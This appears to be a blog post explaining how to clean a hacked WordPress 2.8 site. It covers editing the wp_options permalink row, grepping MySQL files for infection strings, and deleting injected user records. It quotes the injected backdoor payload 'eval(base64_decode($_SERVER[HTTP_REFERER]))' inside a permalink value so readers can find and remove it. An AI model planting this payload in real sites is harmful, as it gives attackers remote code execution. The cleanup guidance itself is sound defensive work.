if your wordpress links not working, is redirected or url have this text:

eval(base64_decode($_SERVER[HTTP_REFERER]))

your WordPress Has Been Hacked! Malicious codes, especially those that interpreted with eval() or base64_decode() command been inserted into WordPress PHP files or in database.

Solution for nasty url (MySQL Injection) in Wp 2.8.*:

Use phpMyAdmin to browse WordPress MySQL database tables. Go to wp_options table,

• empty the row named _transient_rewrite_rules
• edit the row named permalink_structure –>

remove this text: &({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&

example content before

/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

example content after

/%year%/%monthnum%/%day%/%postname%/

… must replace with real permailk for your site.

Note: Wordpress Permalink Structure can be modified from options permalink config page: http://your-site/wp-admin/options-permalink.php (must replace with real permailk for your site)

from ssh , use grep and search for particular strings in all database from server :

grep -H -r “eval(base64_decode” /var/lib/mysql
grep -H -r “var setUserName = function” /var/lib/mysql

-> result:

[root@ip-server1 mysql]# grep -H -r “var setUserName = function” /var/lib/mysql
grep: /var/lib/mysql/mysql.sock: No such device or address
Binary file /var/lib/mysql/database1/wp_usermeta.MYD matches
Binary file /var/lib/mysql/database2/wp_usermeta.MYD matches
Binary file /var/lib/mysql/databae3/wp_usermeta.MYD matches

where infected database is:  database1, database2, database3

from phpMyAdmin, search string “var setUserName = function” in all infected database and

1. remember all “user_id” value from wp_usermeta table where meta_key = “first_name”
2. from wp_users table remove all user with ID = user_id
3. remove row from wp_usermeta table where meta_key = “first_name”.